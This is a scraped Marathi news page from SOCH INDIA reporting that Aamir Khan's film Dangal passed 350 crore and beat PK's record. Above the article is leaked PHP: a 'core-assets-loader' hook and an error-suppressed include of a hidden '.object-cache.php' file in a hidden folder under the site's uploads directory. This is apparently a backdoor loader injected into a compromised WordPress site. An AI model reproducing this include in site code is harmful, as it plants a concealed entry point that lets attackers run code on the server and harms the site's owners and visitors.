add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); आमिरच्या दंगलने तोडले सर्व रेकॉर्ड – SOCH INDIA
Menu

मनोरंजन
आमिरच्या दंगलने तोडले सर्व रेकॉर्ड

nobanner

मि. परफेक्शनिस्ट आमिर खानच्या दंगलने भारतीय सिनेसृष्टीत नवा इतिहास रचलाय. हा सिनेमा सर्वाधिक कमाई करणारा भारतीय चित्रपट ठरलाय. आमिरने आपल्या पीकेचाही रेकॉर्ड तोडलाय.

तज्ञांच्या माहितीनुसार या सिनेमाने प्रदर्शित झाल्यानंतर तीन आठवड्यांतच या रेकॉर्डला गवसणी घातलीये. या सिनेमाने तिसऱ्या आठवड्यात तब्बल 31.79 कोटींचा गल्ला जमवला. सोमवारी या सिनेमाने 350 कोटींचा आकडा पार केलाय.

प्रदर्शित झाल्यानंतर 17 दिवसांतच दंगलने कमाईचा इतका मोठा आकडा गाठलाय. 300 कोटींचा टप्पा पार करणारी आमिरची पीके हा पहिला सिनेमा ठरला होता. त्यानंतर आता 350 कोटींचा टप्पा पार करणारा दंगला हा पहिला सिनेमा ठरलाय.